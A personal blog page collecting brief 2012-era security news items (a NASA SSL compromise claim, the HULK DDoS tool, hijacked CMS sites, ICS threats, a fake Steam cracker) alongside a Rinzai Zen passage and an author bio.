NASA Investigates SSL Compromise

nasaA NASA spokesperson told SecurityWeek they were investigating claims made by a group of Iranian hackers May 16 that they have compromised the SSL certificate used on the NASA Solicitation and Proposal Integrated Review and Evaluation System (NSPIRES) Web site.

The Iranian student group comprised of programmers and hackers — known as the Cyber Warriors Team claimed to have compromised the SSL cert was compromised by exploiting an existing vulnerability within the portal’s log-in system.

HULK DDoS Tool Smash Web Servers

hulkResearchers from Kapersky Lab recently reported on a new distributed denial-of-service (DDoS) tool. The HTTP Unbearable Load King (HULK) tool is different from others of its kind in that it does not simply hit a server with a massive load of TCP SYN requests or other predictable packets.

Instead, HULK generates numerous unique requests designed to prevent server defenses from recognizing a pattern and filtering the attack traffic. The HULK DDoS tool is the work of Barry Shteiman, a security pro who developed it out of frustration with the obvious patterns produced by other such tools.

Spammers Hijack Joomla and WordPress Sites

hacker2Security experts found many compromised WordPress and Joomla Web sites used by spammers to advertise sketchy diet pills and counterfeit luxury goods. The owners of these sites are most likely unaware of what is going on.

Web masters often fail to check their sites’ subdirectories for signs of malicious files and Web pages, thus allowing cybercriminals to use the domain’s reputation to host their scams. Attackers often brute-force administrator passwords to gain access to a site’s back end.

DHS Questions Security of ISC

off switchOperators of America’s power, water, and manufacturing facilities use industrial control systems (ICS) to manage them. However, the security of these systems, increasingly linked with Microsoft Windows and the Internet, is now under intense scrutiny because of growing awareness that they could be attacked and cause massive disruptions.

Industrial facility operators are making efforts to follow security procedures, such as using vulnerability-assessment scanning tools to check for needed patches in Windows. That said, ICS environments present special problems, said managers who spoke on the topic at a conference organized by the DHS.

Chief Legal Officers and CIOs Must Work Together

in secureIn a survey by Gartner and ALM, Chief legal officers (CLOs) need to engage enterprise CIOs more.  Further, while CLOs voice consideration for CIOs as contributors to corporate strategy, they continue to lack fundimental understanding of how to use technology in the enterprise or how to interact with their IT departments.

"The survey results showed that communication is the key variable in the success or lack of success of the CLO/IT relationship," said French Caldwell, vice president and Gartner fellow. "When CLOs have substantive conversations with CIOs more than once a month, CLO satisfaction with IT is higher."

Rinzai Zen - Fujaku, Fugu

fujaku fugu

Samsara is the same as nirvana, defilement the same as purity, and delusion the same as enlightenment.  The challenge to understanding is due to one's ignorance -- the ignorance in mistaking phenomena for ultimate reality. Great is Mind. Heaven's height is immeasurable, but Mind goes beyond heaven; the earth's depth is also unfathomable, but Mind reaches below the earth.

Study Zen -- one discovers the key to all forms of Buddhism.
Practice Zen -- one's life is brought to fulfillment in the attainment of enlightenment.

"Where should your mind be kept?  If your mind is not fixed anywhere it will pervade throughout the body... If your mind is fixed on a certain spot, it will be seized by that spot, and no activities can be performed efficiently. Not to fix your mind anywhere is essential. Not fixed anywhere, the mind is everywhere." 

Hacking Governments With Hijacked Sites

hackerMalicious code planted within compromised Wed pages has become the latest method for attackers targeting government organizations, according to research from security firm Zscaler, V3.co.uk reported April 21. The firm discovered many government-affiliated Web sites with code that directs users to attack servers.

The most recent site to become infected was that of the French budget minister. It was found to contain obfuscated Javascript code that sends the user to a third party site and then attempts to exploit vulnerabilities and install malware on the targeted system. The attack is the latest in what Zscaler sees as a string of site hijackings aimed at government-controlled domains.

Social Engineers Target Utilities

uscert2The U.S. Cyber Emergency Response Team (US-CERT) recently warned that cyber criminals are attempting highly targeted social engineering attacks on operators of Industrial Control Systems (ICS).  ICS are very present in Utility firms. The attacks are in the form of phishing phone calls allegedly coming from "Microsoft Server Department" and warning of infected PCs. The attacker attempts to have the utilities turn on services which would allow unauthorized remote access

HINT: Microsoft is not going to call you unless you specifically requested to be called. (see also US Utilities Under Daily Cyber-attack)

Steam Cracker Steals User Credentials

keyloggerUsers of Valve’s Steam game sales and distribution platform are being targeted by malware peddlers; the lure is a "Steam Cracker." It is being offered on YouTube and on many gamer forums, and it supposedly gives the users access to all games for free.

The scammers offer simple instructions for installing the software: disable antivirus software and firewall, then replace the original steam.exe file with the downloaded, cracked one. "The file in question is a fake Steam client, which uses aspects of the real thing but just falls short of being 100 percent convincing (file size, file, and of course the fact that this file isn’t digitally signed unlike the real Steam executable)," a GFI researcher said.

If the user runs Windows Vista or later versions of the platform, the file runs and shows the fake client that looks legitimate.

Information

Pragmatic Journey is Richard (rich) Wermske's life of recovery; a spiritual journey inspired by Buddhism, a career in technology and management with linux, digital security, bpm, and paralegal stuff; augmented with gaming, literature, philosophy, art and music; and compassionate kinship with all things living -- especially cats; and people with whom I share no common language.